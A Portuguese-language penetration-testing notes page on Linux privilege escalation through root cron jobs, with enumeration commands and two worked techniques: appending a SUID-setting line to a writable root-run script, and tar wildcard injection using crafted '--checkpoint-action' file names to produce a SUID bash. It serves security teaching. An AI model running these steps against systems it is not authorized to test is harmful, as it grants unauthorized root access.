> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/privesc/cron-jobs.md).

# Tarefas Cron

Tarefas cron criam caminhos de escalonamento de privilégio quando tarefas recorrentes do root executam scripts graváveis, caminhos relativos inseguros ou processadores vulneráveis. O ponto principal é provar que um usuário com poucos privilégios controla algo que uma tarefa agendada privilegiada irá executar.

## Metodologia

* Revise os crontabs do sistema, diretórios cron, timers e scripts graváveis.
* Use o pspy64 para observar processos de curta duração sem root.
* Verifique se a tarefa usa valores de PATH inseguros, arquivos graváveis ou diretórios de entrada controlados pelo invasor.

## Verificações rápidas

```bash
crontab -l
cat /etc/crontab
ls -la /etc/cron.*
cat /etc/cron* 2>/dev/null
find /etc/cron* -type f -exec ls -la {} \; 2>/dev/null
find /var/spool/cron -type f -exec ls -la {} \; 2>/dev/null
systemctl list-timers --all
```

## Alvos Graváveis do Cron

Procure scripts ou diretórios que uma tarefa cron privilegiada executa e que um usuário com poucos privilégios pode modificar.

```bash
find /etc/cron* -type f -writable 2>/dev/null
find / -writable -type f -path "*cron*" 2>/dev/null
```

Use `pspy64` quando as tarefas cron são de curta duração ou não ficam visíveis em arquivos estáticos:

```bash
./pspy64
```

Se uma tarefa cron do root executa um script gravável, uma validação simples é definir um bit SUID no Bash e aguardar a execução agendada:

```bash
echo 'chmod +s /bin/bash' >> /path/to/writable/script.sh
/bin/bash -p
```

### Injeção com Wildcards

Se uma tarefa cron usa comandos de arquivamento com wildcards em um diretório gravável, nomes de arquivo podem se tornar opções de comando.

```bash
cd /var/www/
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > exploit.sh
chmod +x exploit.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh exploit.sh"
```

Depois que a tarefa cron for executada:

```bash
/tmp/bash -p
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Calculadora de Expressões Cron</h4></td><td>Pesquise expressões cron comuns, strings especiais, sintaxe de campos, significados de agendamento e notas de revisão de escalonamento de privilégio.</td><td><a href="/pages/00385121a54a89357c8e44772fc8d23dc70dc39d">/pages/00385121a54a89357c8e44772fc8d23dc70dc39d</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Enumeração de Cron com pspy64</h4></td><td>Notas da ferramenta pspy64 para escalonamento de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatório.</td><td><a href="/pages/c1280fcf5d00cc04323feae6222190054697210f">/pages/c1280fcf5d00cc04323feae6222190054697210f</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Tarefa Cron com Script Bash Modificado</h4></td><td>Notas sobre Tarefas Cron - Script Modificado (Bash) para escalonamento de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatório.</td><td><a href="/pages/833c5b7028ed73b7c37575afb9057e2c18e51169">/pages/833c5b7028ed73b7c37575afb9057e2c18e51169</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Tarefa Cron com Script Python Modificado</h4></td><td>Notas sobre Tarefas Cron - Script Modificado (Python) para escalonamento de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatório.</td><td><a href="/pages/c71b1fca1f91ca0ec0d6adfa0f18a45737e5c9ea">/pages/c71b1fca1f91ca0ec0d6adfa0f18a45737e5c9ea</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Abuso do ImageMagick via Cron</h4></td><td>Notas sobre Tarefas Cron - Exploração do ImageMagick para escalonamento de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatório.</td><td><a href="/pages/2de7928f091242a6888d24c762c362a4adb0ccae">/pages/2de7928f091242a6888d24c762c362a4adb0ccae</a></td></tr><tr><td><h3><i class="fa-clock" style="color:$primary;">:clock:</i></h3></td><td><h4>Abuso do Logstash via Cron</h4></td><td>Notas sobre Tarefas Cron (Logstash) para escalonamento de privilégio no Linux, com etapas de enumeração, exemplos de exploração e validação voltada para relatório.</td><td><a href="/pages/b06a5a5330264de1b0d791b35996090cc0fb6a0e">/pages/b06a5a5330264de1b0d791b35996090cc0fb6a0e</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/privesc/cron-jobs.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
